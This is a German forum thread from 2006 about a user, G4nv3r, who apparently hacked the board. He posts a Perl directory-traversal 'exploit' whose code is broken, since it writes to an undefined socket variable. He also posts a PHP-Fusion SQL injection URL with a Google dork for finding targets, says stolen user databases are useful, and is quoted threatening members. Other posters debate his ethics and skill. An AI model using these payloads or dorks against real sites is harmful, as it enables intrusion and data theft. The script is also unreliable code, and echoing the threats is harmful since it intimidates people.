Hier bin ich

G4nv3r · 21. Juni 2006

Ach ja... Ich mache z.B. auch sowas wie folgendes.

Perl

#!/usr/bin/perl


use IO::Socket;


print q {


built-in web server remote user traversal Exploit


              Author: G4nv3r
              
              Visit: www.hackschool.dl.am


              Example: biwsrute.pl <target> - targethost


###########################################################
#                                                         #
# http://securitytracker.com/alerts/2006/May/1016109.html #
#                                                         #
###########################################################
};


$addr = $ARGV[0];
$dir = 'C:%5C/';


print "Target: $addr\n";
print "[~] Connecting with target...\n";


$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$addr", PeerPort=>"8080") || die "[-] Connection failed :-(\n";
print "[+] Connected!\n";
print $socket "GET / HTTP/1.1\n";


$remote_user = "http://.$addr.$dir";


print $sock "GET $remote_user HTTP/1.1\n";


close($sock);

Alles anzeigen

...und

Code

----------------------------------------------------------------
I found a vulnerability in PHP-Fusion 6.00.307


                      G4nv3r


                 www.hackschool.dl.am


----------------------------------------------------------------


[-] Exploit: http://www.target.com/setuser.php?cat="(user_id)", "users", "user_name='$user_name' AND user_password='$user_pass'"


[-] Googledork: inurl:/phpfusion/setuser.php

Alles anzeigen

Corryn · 21. Juni 2006

Hi G4nv3r,

Solange du nur als White bzw. Grey Hat in Aktion trittst, begrüße ich dein Tun eigentlich.

Perl-Skripte mit SQL-Injections sind zwar nicht gerade so anspruchsvoll wie ein hübscher Buffer/Stack/Heap Overflow-Exploit in Assembler, aber sie erfüllen ihren Zweck

Ehrlich, ich habe große Sympathie mit der Hacker-Szene, denn bei manchen Reaktionen wie z. Bsp. hier, à la "die Datenbank ist sicher", "das kann nicht sein" usw. obwohl man keine Ahnung von der Materie hat, lassen einen nur den Kopf schütteln. Da ist es gut, wenn manche Admins einfach mal gezeigt bekommen, zu was zu große Sorglosigkeit führen kann.

Sicher hat kaum ein Hobby-Admin die Zeit und Möglichkeiten, um ein System stets aktuell zu halten, aber wenn man selbst nach eindeutigen Hinweisen untätig bleibt, haben es einige nicht anders verdient. Denn auch wenn man nicht gerade Kreditkarten-Nummern oder ähnliches gespeichert hat, gibt es immer noch genügend Informationen, die nicht für jeden offen liegen sollten (z. Bsp. Email-Adressen, die in gewissen Kreisen ne Menge wert sind).

G4nv3r · 21. Juni 2006

user_db's lassen sich auch ziemlich gut gebrauchen. Vorallem von Erwachsenen.

schdaeff · 21. Juni 2006

Zitat

Original von Patrick
leute .. ich fand das damals auch nicht so lustig aber ich habe mit dem kollegen
schon einige interessante mails geschrieben und im grunde genommen hat er mir geholfen damit.

es stimmt auch das auf seine email nicht reagiert wurde - mein fehler auf eine gewissen art da ich diese als spam angesehen habe.

mein vorschlag: wir sollten ihm dankbar sein, ich bins auf jeden fall, wer das nicht kann muss es ja auch nicht sein.

ich jedenfalls würde mich freuen wenn G4nv3r beim nächsten mal nochmal bescheid gibt per email oder pn, falls es wieder eine lücke gibt

deal ?

grüße, patrick

PS: wir stellen dich einfach ein als persönlicher sicherheitslochsucher

Alles anzeigen

Damit ist doch eigentlich alles gesagt - ob man persönliche Abneigungen gegen Hacker hat, ist Sache jedes Einzelnen.

Ich denke jedenfalls, wir können froh sein, dass es bei einem derart harmlosen Angriff geblieben ist.

buddler · 22. Juni 2006

Der Umgangston möge angemessener werden:

Zitat

Hallo, ich bin es G4nv3r. *OMG* Na dann ruft doch mal bei ***zensiert*** aus Dessau an. Tut euch keinen Zwang an. Außerdem wer sagt das ich \"***zensiert***\" heisse? *ROFL* Ich kenne bestimmt mehr Leute als du... Bei uns in der Crew sind mehrere Russen vertreten und die bloeffen nicht. In diesem Sinne, MfG. G4nv3r.

Er weiß welcher Name da stand.

Keep on hacking. Und möge es die richtigen treffen (Nazis).

Nuuk · 22. Juni 2006

ich weiß ja nicht, ob sich hier schon mal jemand die mühe gemacht hat, auf die seite von G4nv3r zu schauen... dort wird für jeden idioten nachvollziehbar in nem video gezeigt, wie man ein board mit einer veralteten software "hackt".
Um das ganze mal zusammenzufassen. G4nv3r veröffentlich auf seiner seite, wie man ein board mit einer veralteten software "hackt". mal abgesehen davon, dass es eine ähnliche anleitung wohl auf mindestens 50 weitern sites im netz gibt, liegt G4nv3r ja nur die sicherheit der user am herzen. damit diese user jetzt noch sicher sein können (nachdem ja jeder 10 jährige ne anleitung hat wie man ein board mit alter software klein kriegt) läuft er durchs netzt und hackt selbst die board (er hat ja nur gutes im sinn). ist das nicht etwas schizophren?

merkt hier eigentlich keiner, dass wird es mit einem ca. 16 jährigen zu tun haben.? wenn er hier mal irgendwann eine sicherheitslücke aufdecken sollte, dann auch nur weil die schon längst bekannt ist und er halt geschaut hat, ob das board ne alte version ist.
mir ist das unverständlich was hier abgeht...

abgesehen davon ist ja schon länger bekannt, dass es hier sicherheitslücken gibt- auch wenn die immer schöngeredet wurden. wer dann noch eine wichtige email addresse angibt, oder seine richtige tel-nr der braucht sich ja im grunde genommen nicht wundern...

Corryn · 23. Juni 2006

Hast schon recht, ein ehrlicher Hacker hat es nicht nötig mit seinen Fähigkeiten zu prahlen. (Zumal einfache SQL-Injections von jedem mit ein wenig Programmiererfahrung in 3/4 Wochen selbst erlernbar sind.)

Aber was solls, lassen wir ihm den Ego-Trip. Wenn er dann im Informatik-Studium an LA gescheitert ist, kann er mit etwas Glück und Mühe immer noch auf die gute Seite wechseln und als Pen-Tester irgendwo unterkommen

Nuuk · 23. Juni 2006

LOL

immerhin hatten wir bei den videos mal wieder was zum lachen..

ich find nur die reaktionen von einem teil hier erschreckend. aber das wundert mich ja nach einigen anderen threads schon fast nicht mehr.

Drumstudio1 · 23. Juni 2006

Nuuk

Ich weiß nicht. Ich finde individueller wie in diesem Thread kann man nicht reagieren.

Die einen finden seinen Job gut. Andere zu denen ich auch gehöre haben auf viele Widersprüchlichkeiten sofort hingewiesen - und auch deutlich Zweifel angemeldet. Gerade dieser Anti-Nazi-Hack - sowas finde ich klasse, hatte eher das Gefühl dass vielleicht auf die soziale Ader von erfahreneren Kollegen hingewiesen wird. Noch dazu da sein Sprachgebrauch in seiner Signatur absolut "Hooligan-kompatibel" war... darum dieses Statement von mir. Und erfeulicherweise (auch in Bezug auf den Tonfall hier im Forum, und was wir zu tolerieren bereit sind) hatte er daraufhin die Signatur total verändert.

Zitat

Wenn das stimmt, dann danke ich Dir!

Die Signatur finde ich trotzdem ganz schlimm! Die Unterscheidet sich sprachlich erschreckenderweiser nicht vom rechten Hooligan-Tonfall. Da will ich Dir nichts böses, im Gegenteil: eigentlich nur mal einen Denkanstoß geben, ob Du gerne "verwechselt" werden willst.

Nochmals: ich muß gestehen, dass ich Deine pauschal-Kritik

Zitat

merkt hier eigentlich keiner, dass wird es mit einem ca. 16 jährigen zu tun haben.... mir ist das unverständlich was hier abgeht...

nicht verstehen kann. Wir hatten hier diverseste Formen der Reaktion. Gleichwohl ist abseits des Pauschal-Verdachts Dein Hinweis wertvoll, da er wiederum eine massive Widersprüchlichkeit im Agieren von G4... aufzeigt. Aber nochmals: auf Glaubwürdigkeitsprobleme hatten hier schon mehrere hingewiesen.

Das folgende Statement finde ich sogar etwas anmaßend:

Zitat

ich find nur die reaktionen vom rest hier erschreckend. aber das wundert mich ja nach einigen anderen threads schon fast nicht mehr.

Vielleicht revidierungsbedürftig?

Back to work

Nuuk · 23. Juni 2006

ok, ich hab den satz etwas abgeändert, nachdem das wohl doch zu verallgemeinernd war. dennoch ändert das nichts an den tatsachen, dass hier oftmal von leuten dinge zum thema sicherheit schön geredet werden, die scheinbar überhaupt nicht wissen von was sie reden. dann steht plötzlich einer von der tür, nutzt die sicherheitslücke aus und alle freuen sich. sehr interessant....

zum thema pauschaulkritik: ich denke du bist einfach in nem anderen zeitalter groß geworden als ich. als ich 16 war gabs solch eine szene auch schon, von dem her liegt dem einfach ein anderes grundverständnis vor. ich kannte damals auch leute wie G4.... und ich wette wenn ich mir jetzt die mühe machen würde ne viertel stunde zu recherchieren, würden sich meine vermutungen auch bestätigen lassen. allerdings fehlt mir dazu momentan die zeit. ich kann darauf auch in ein paar wochen zurück kommen, wenn irgendjemand so viel dran liegen sollte.

ich denke die große breite der antworten liegt einfach im verständnis das dem sachverhalt zu grunde liegt. wie in diversen anderen threads zum thema sicherheit auch.

Drumstudio1 · 23. Juni 2006

Zitat

zum thema pauschaulkritik: ich denke du bist einfach in nem anderen zeitalter groß geworden als ich. als ich 16 war gabs solch eine szene auch schon,

Glaubst Du? Oder weißt Du?

Jaja, immer auf die Alten "einhauen". Das erste Mal das ich eine kleine aber feine Hackerszene in Deutschland wahrnahm war 1984/85. Kennt noch jemand Akustikkoppler mit ihren erschreckend niedrigen Baud-Raten?

Deutlich davor kannte man vom "Hörensagen" die historischen Vorläufer (Ok, etwas weit hergeholt) die in den USA angeblich als Ausdruck ihrer Rebellion gegen den Vietnam-Krieg und die vielen Querverbindungen zwischen Militär und Wirtschaft manche damit assozierten Telefongesellschaften beschummelten, in dem sie per Mundpropaganda oder auf Blaupausenbasis (also irgendwie "Analog".... hahaha) Tips weitergaben, wie man ganz simplel und rein mechanisch, Münzfernsprecher dieser Gesellschaften austrickst - und immer wieder umsonst telefoniert. Klingt mehr nach Anarcho- oder "Geiz ist Geil"-Freaks als nach Hackern....

Von den Alten kann man schon noch was lernen... hahaha.

Und noch ein "Hacker-Vorläufer"... bzw. was Freaks aus dem persönlichen Umfeld meiner Jugend früher trieben, damals in den ganz frühen Achtzigern. Als vieles postintern in deren Zentralen noch per zugänglichen Relais oder sonstwas lief und noch manuell geschaltet und gewaltet werden konnte. Ich kannte mehrere Personen die Freunde im Technikbereich der dt. Post hatten. Als letztere noch für Telefon, Fax, Briefe, Funk bzw. alles! zuständig war. Lang ist es her.

Standen längere Telefon-Gespräche in die USA, Australien oder Timbuktu an, war das Procedere folgendes: die Freaks riefen ihre vertraute Kontaktperson der Post an. Diese schaltete zur vereinbarten Zeit das entsprechende Relais um, und schon konnten die Freaks stundenlang umsonst in die exotischsten Regionen der Welt telefonieren (oder zum billigsten Ortstarif - so genau weiß ich es nicht mehr, ich glaube Ortstarif galt als bessere Methode um unentdeckt zu bleiben). Diese Personen (deren Namen mir mittlerweile entfallen sind) haben das über Jahre praktiziert. Dieses Verfahren und das Nutzen der verbilligten bzw. Gratis-Telefonie war selbst höheren Ebenen der Postverwaltung nicht bekannt. Wie gesagt, das wurde aber jahrelang von mehreren Personen in Deutschland praktiziert und das Funktionieren war stets an der niedrigen Telefonrechnung für jene Personen überprüfbar.

Ich finde sowas heute rückblickend nicht in Ordnung und kriminiell. Habe auch nie dieser Szene angehört, da mich das trommeln mehr packte. Trotzdem sind die Manipulationsmöglichkeiten zwischen Mensch und Maschine nicht erst seit dem Internet ein Thema für Technik-Freaks.

Verzeih´ den historischen Exkurs NUUK. Inhaltlich liegen wir ohnehin nicht soo weit auseinander

Nuuk · 23. Juni 2006

yo, dein exkurs ist schon ok. ist ja auch durchaus interessant zu lesen, wobei ich zugeben muss dass ich 84 noch nicht an rechnern saß. tut ja aber auch nichts zur sache.

hier gehts aber ja auch nicht um die freaks, bzw. hacker die mittels verständnis und wissen sicherheitslücken finden, sondern um leute die mittels bekannter (!) sicherheitslücken sites angreifen ihr logo drauf hinterlassen und dann am nächsten tag bei ihren kumpels und kollegen (ich formulier das jetzt mal so...) angeben zu können. (und genau die szene meinte ich. es wäre vermessen in diesem zusammenhang auf die wirkliche hacker szene anzuspielen, wobei ich hier rechtliche, bzw ethische aspekte mal ganz außen vor lassen möchte.) die geschichte ist doch uralt. den beweiß dafür liefert die seite unseres, wie er sich selbst nennt "hacker", bzw google. das ganze hat nichts mit wirklichem fachlichen wissen, sondern ist einfach nur (wie man so schön sagt) lame.

ich denke die ganze diskussion führt zu nichts. möge man dieses mal meinen worten vielleicht etwas beachtung schenken und sich erst mal schlau drüber zu machen, wer der herr G4... überhaupt genau ist, bevor man ihn hier zum sicherheitsexperten kürt.

Zitat

Original von Drumstudio1
[Trotzdem sind die Manipulationsmöglichkeiten zwischen Mensch und Maschine nicht erst seit dem Internet ein Thema für Technik-Freaks.

haja. letztendlich ist jedes physikalische system irgendwie manipulierbar. aber vielleicht treffen uns da mal in irgendeinem technischen forum wieder, bevor das hier ausufert...

Jetzt mitmachen!